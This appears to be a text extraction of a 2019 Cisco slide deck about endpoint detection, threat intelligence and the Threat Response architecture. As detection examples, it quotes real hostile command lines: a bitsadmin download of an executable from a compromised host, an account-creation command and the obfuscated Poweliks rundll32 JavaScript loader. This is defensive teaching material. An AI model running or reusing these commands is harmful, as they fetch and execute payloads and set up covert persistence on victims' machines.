Cisco Threat Response Architecture...Strategy Knowledge Features Detection Engines Coverage The...

Post on 20-Sep-2020

6 views 0 download

Transcript of Cisco Threat Response Architecture...Strategy Knowledge Features Detection Engines Coverage The...

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Thorsten SchranzAdvanced Malware Prevention (AMP)2019-05-21

Cisco Threat Response ArchitectureWhy we need endpoint information

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Behavior

Complexity

Company

ProductsMalware

Mindset

Strategy

Knowledge

Features

Detection Engines

Coverage

The history of Endpoint Protection

Probability

Detection?

Investigation?

Remediation?

…the Strategy, Products andMalware mustfit to be sucessful in theFuture…

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

From Event to Context – what can be includedEvent(s)Event from variouspoint of products.

Context

Includes much information. Events are one part only.

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Sensor

SharingIntelligence

Sensor

Generates processable Data

Intelligence

Processes theSensor Data

Sharing

Automated sharing and processing the Analysis Data with other Intelligences or Products

What is Threat Intelligence – Key Components

Outcome

Analysis dataIOC dataBehavior InformationRelationship between Artifacts

Outcome

Sensor

Intelligence

Sharing

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

SharingThreat Information

Cisco Products

3rd Integrations

Intelligence to Intelligence OR Intelligence to Product

Sensorson a world wide base

Network (NetFlow)

Content (Web, E-mail)

DNS based

File Analysis

3rd Party Feeds

Trusted Sources

Intelligences

Co-Occurrence Model

Anomaly Detection, Trust Modeling, Events Classification, Relationship

Modeling

Correlations, Artificial Intelligence3rd Party Intelligence

Extensive Automation Framework, Large Scale Datamining, Big Data

Analytics and automated detection

Generating an understanding

real world secenarios

OnPremise Intelligences

Threat Intelligence

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Postulation – Single spot is not enough

Known Good

Unknown

Known Bad

Complexity

Protection

+

Sensor

Intelligence

Single Spot 1:1 Analysis Multi Spot n:n Analysis

Endpoint

Mail

Web

IPS

NGFW

Protection

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Postulation – Single spot is not enough

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Single Spot(Sensor)

Multi Spot(Sensor)

Context

Includes much information. Events are one part only.

Classify basedon context

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Endpoint Challenge Example – 1:1 Volume

Counters by Talos

• To much data to handle OnPremise

• To much data to handle directly on the client

• Threat Landscape is to complex to be handled on the endpoint only

• Another approach necessary

46M OS operation events

• 8.7M File events

• 11.5K Process events

• 114K Network events

• 35M Registry events

• 1.5M unique Samples Daily

• 20B Threats blocked/day

• 150B DNS entries daily

• 18.5B AMP queries/day

• 16B URLs/Web requests daily

• Threat Data processed: 120TB/day, 3.6PB/month

4,9

96,8

95,5

29

un

iqu

eh

ash

es

/ w

ee

k

20min. with Win 10(Procmon)

Result

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

46M OS operation events

• 8.7M File events

• 11.5K Process events

• 114K Network events

• 35M Registry events

• To much data to handle OnPremise

• To much data to handle directly on the client

• Threat Landscape is to complex to be handled on the endpoint only

• Another approach necessary

Endpoint Challenge Example – 1:n Complexity

Result20min. with Win 10

(Procmon)Counters by Talos

• 1.5M unique Samples Daily

• 20B Threats blocked/day

• 150B DNS entries daily

• 18.5B AMP queries/day

• 16B URLs/Web requests daily

• Threat Data processed: 120TB/day, 3.6PB/month

4,9

96,8

95,5

29

un

iqu

eh

ash

es

/ w

ee

k

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Behavior Cluster

Malicious behaviour cluster including hundrets/thousands/million artifacts and also including one or more Threat Events

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

N + = X

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Event

Event Details

Endpoint Chellange Example – 1:n Time Window

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

N + = X

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Event

Event Details

Engines / Technologies

Protection Engines1 to X

Advanced Analytics

When needed?

Configuration

Endpoint Configuration

Cloud and Intelligence

When querying cloud

or other intelligences

Start

Something comes up

at the endpoint.

1 of 46 Million

Endpoint Challenge Example – 1:n Timeline

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Bad or not?

C:\Windows\system32\cmd.exe /c net user 'jmaldive' /add

Windows command-lineLegitimes Windows Feature

User Mgmt.Tool

Argument: User mit Namenjmaldive hinzufügen

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Bad or not?

"C:\Windows\System32\bitsadmin.exe" /transfer kiWDPYASe /download/priority foreground https://www.uz.gov.ua/en/:7777/content C:\trust.exe

Windows Update Command Line Arguments

Domain• Category: Business• Reputation: good• IP-Reputation: good• Status: Compromised?

Payload

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

rundll32.exe javascript:\..\mshtml,RunHTMLApplication

;eval(epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu

)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5

cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*.replace(/./g,functi

on(_){return%20String.fromCharCode(_.charCodeAt()-1);}))

Bad or not?

WindowsComponent

Java

Command Line Argument

Poweliks is a fileless click-fraud malware

variant which resides within the registry. It

maintains persistence by creating a registry

key that makes use of rundll32 to execute

javascript code to read Powershell from the

Windows registry, which subsequently

executes portable executable code in memory.

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

What is part of my Security Architecture??

What happens

Threats?

Fileless ?

Legitimate OS Feature Usage?

What we talk about

Specific Single Topics!

E.g. Mimikatz

E.g. Detection Rate

** Source: https://mitre-attack.github.io/attack-navigator/enterprise/

Impact

Product Strategy

Solution Design

Correlations in SIEM

Mitre: Techniques linked to tactics**

11 Tactics

300 Techniques

….where we may not talk about….

Combinations of Tactics and Techniques

Timeline

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Mitre ATT&CK

Mitre ATT&CK

Tactics linkedto techniques.

tactics persistence

initial-access

command-and-control

exfiltration

collection

lateral-movement

execution

credential-access

discovery

privilege-escalation

defense-evasion

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Mitre ATT&CK

tactics persistence

.bash_profile and .bashrc

accessibility features

account manipulation

appcert dlls

appinint dlls

application shimming

authentication package

bits jobs

bootkit

browser extension

change default file association

component firmware

component object model highjacking

create account

dll search order hijacking

dylib hijacking

external remote access

file system permission weakness

hidden files and directories

hooking

hypervisor

Image file execution options

kernel modules and extension

launch agent

launch demon

lauchctl

lc_load_dylib_addition

local job sheduling

login item

logon script

lass driver

modify existing service

netsh helper dll

new service

office application startup

path interception

plist modification

port knocking

port monitors

rc.common

re-open applications

redundant access

registry run keys / startup folder

scheduled tasks

screensaver

security support provider

service registry permission weakness

setui and setgid

shortcut modification

sip and trust provider hijacking

startup items

system firmware

time providers

trap

valid accounts

web shell

windows management instrumentation

winlogon helper dll

bits jobs

Create account

Kernel modules and extensions

login script

new service

Scheduled tasks

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

What is part of my architecture??

Network Layer

NGFW

NGIPS E-MailWebThreat Grid

SecurityCameras

Thermostats

VoIP Phones

Printers

SOC

Monitoring and Threat Hunting

Windows command-line

Legitimate Windows FeatureC&C Info in Graphics

twitter.com

Mobile Users

Endpoint

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

The Race – Threats and Endpoint Strategy

Endpoint

#Legitimate OS Feature usage

#Command Line

#Behavior

#communication

#file creation

#fileless

#timline

#Just-in-Time

#artifacts

#payload

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Endpoint Connector Endpoint Backend

Protection

Engines

Endpoint

Monitoring

Backend

Intelligence

Endpoint

TimeResource

Step 3: Endpoint Monitoring

Step 2: Backend Intelligence

Step 1: Endpoint Connector and Backend

Step 4: Moving Time and Resource intensive Processes from the Endpoint to the Backend

SOAR

and SIEM

Capabilities

Files

Process

Network

CMD

IOC

Step 5: Analysis 7x24x365 in Backend

Backend

Management

TimeResource

The Race – Threats and Endpoint Strategy

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Endpoint Connector Endpoint Backend

Protection

Engines

Endpoint

Monitoring

Backend

Intelligence

SOAR

and SIEM

Capabilities

Files

Process

Network

CMD

IOC

Backend

Management

AMP Architecture and Platform

Threat

Intelligence

and

Research

Advanced

Analytics

Agentless

Detection

Mail

Web

IPS

NGFW

Perimeter

&

Network

3rd Party

Integration

Standards

APIs

The Race – Threats and Endpoint Strategy

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Meraki Systems Manager

Tetration

Web Security

Email Security+CLOUD

Advanced ThreatAMP FOR ENDPOINTS • AMP CLOUD

THREAT GRID • COGNITIVE

Identity Services Engine +pxGRID

Umbrella+INVESTIGATE

Digital Network ArchitectureCATALYST • NEXUS • MERAKI MS

AIRONET/WLC • MERAKI MR

Firepower NGFW/NGIPS

Threat Response

Stealthwatch+CLOUD

Secure SD-WAN / RouterISR • CSR • ASR • vEDGE

MERAKI MX

Integrated Architecture

CloudlockThreat Response – The Future

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

The Race – Threats and Endpoint Strategy

Threat

Response

Threat

Intelligence

and

Research

Advanced

Analytics

Agentless

Detection

Mail

Web

IPS

NGFW

Perimeter

&

Network

^

3rd Party

Integration

Standards

APIs

AMP

for

Endpoints

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Event

AnalysisReport Trajectory-

Threat Hunt

The Race – Threats and Endpoint Strategy

Web Analysis

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Real World Example

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Disk Memory

Sophisticated Malware Example – Infection/Protection (CL)

Code Installation

Malware installedCode

Injection

Binary Data

Dynamic created Content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?

Unknown? WORKING Hidden, Stealthy, time-delayed

DECOY User

PREVENT Detection

New Sample in the world

In Memory

Evasion

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Disk Memory

Sophisticated Malware Example – Infection/Protection (CL)

Code Installation

Malware installedCode

Injection

Binary Data

Dynamic created Content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?

Unknown? WORKING Hidden, Stealthy, time-delayed

DECOY User

PREVENT Detection

New Sample in the world

In Memory

Evasion

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Event

OnAcces Scan?

OnDemand Scan?

Event not handled?Behavior Cluster

Malicious behaviour cluster including hundrets/thousands/million artifacts and also including one or more Threat Events

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Disk Memory

Code Installation

Malware installedCode

Injection

Binary Data

Dynamic created Content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?

Unknown? WORKING Hidden, Stealthy, time-delayed

DECOY User

PREVENT Detection

New Sample in the world

In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Status: Clean

No Sample, no Signature

Infection Vector unknown

Time-to-detect infected host

Single File not malicious

C&C Communication

Data Loss

Which Artifacts are left for investigation?

Which Information is available for investigation?

Artifact Dependencies

File less and persistant

Sophisticated Malware Example – Infection/Protection (CL)

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Disk Memory

Code Installation

Malware installedCode

Injection

Binary Data

Dynamic created Content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

In Memory

Evasion

Code generated

Code

Injection

.HLP .MSI

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Endpoint Detection and Response Approach

Monitoring Engine

Disk Activity

Process Activity

Command Line Monitoring

ConnectedIntelligences

Storess and processes

Monitoring data

30

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

31

Disk Memory

Code Installation

Malware installedCode

Injection

Binary Data

Dynamic created Content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Status: Clean

Endpoint Detection and Response Approach

ConnectedIntelligences

Storess and processes

Monitoring data

Monitoring Engine

Disk Activity

Process Activity

Command Line Monitoring

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

32

Disk Memory

Code Installation

Malware installedCode

Injection

Category: Business

Reputation: good

IP-Reputation: good

In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Status: Clean

Endpoint Detection and Response Approach

ConnectedIntelligences

Storess and processes

Monitoring data

Monitoring Engine

Disk Activity

Process Activity

Command Line Monitoring

THREAT Response Architecture

Endpoint Architecute

Files

Process

Network

CMD

IOC

SOAR

and SIEM

Capabilities

Backend

Management

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

IOC Event Detail Examples

Generic IOC: Powershell Download

Monitoring (Sensor)

Intelligence

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Incident Management withoutCisco Threat Response

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Deliver

System back to user

Deliver to User

Format Device

Find

Where, who, howwhen….

Find the Malware

Disk Forensics

OnDemand ScanManual SearchKnowledge?

Full Disk Forensics

Availability

Client not availableUser on PTONo Sensordifferent Department

Availability

Ticketing

Defined Process?

Open Ticket

Verify

Verify the event e.g. if further analysis is necessary

Verify

Searching

Search in Siem or other available InformationSourse, Logfiles andso on.

Search in SIEM

Alert

Malware Alert from a single point of product

Malware Alert

Incident Response (IR) without Cisco Threat Response (CTR)

Timeline (Hours? Days? Weeks?)

Format

Most information lost

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Q1 - Commodity/Targeted?Q2 - Persistency?Q3 - Ransom/Backups?Q4 - Lateral movement?Q5 - Clean/Format?

Steps

What to do next?

Next Steps

a.ExeHash: 92a6…………7a

Result

Result

Analysis Tools

Process Explorer

Wireshark

Full Disk Forensics

Other Tools

ToolsSearch on ClientSearch in SIEM

Q1 - DHCP info?Q2 - AD info?Q3 - CMDB info?Q4 - Vulnerability info?Q5 - AV info?Q6 - Who is doing the C&C?

Alert by Next-Gen Network• C&C Traffic Detected:• Destination : 52.28.249.128Threat

Intelligence?• Source : 10.0.2.11Q, Q, Q, Q, Q, Q, ?• Pcap Capture available?

C&C Traffic Alert

Timeline (Hours? Days? Weeks?)

IR without CTR – C&C traffic alert!!

Searching

Sources?Intelligences?Correlations?

Payload

OS

Hardware

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Visibility with EPP ApproachD

evic

e T

raje

cto

ry

Worstcase – Single Threat Event

Event does not show what really happened

Detection is often not Real-Time

No dependencies between artifacts and behaviour

Missing Information for OnPremise Intelligence

Missing legitimate OS functions and behaviour (chkdsk)

Threat Event?

Threat Event?Threat Event?

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Understand Threat with EPP/EDR approachD

evic

e T

raje

cto

ry

IOC Vulnerability

Application with vulnerability

Execution

Application X was executed by application Y

PDFcreated

Network

Established networkconnections

Activity

Create, execute and network connection

Activity

Malicious File starts chkdsk.exe

Chkdsk.exe

Network connection and drops/executes a malicious file.

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Demo: from Webtraffic to the endpoint

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Thank you…the Strategy, Products and Malware must

fit to be successful in the future..

cisco.com/go/ampendpoint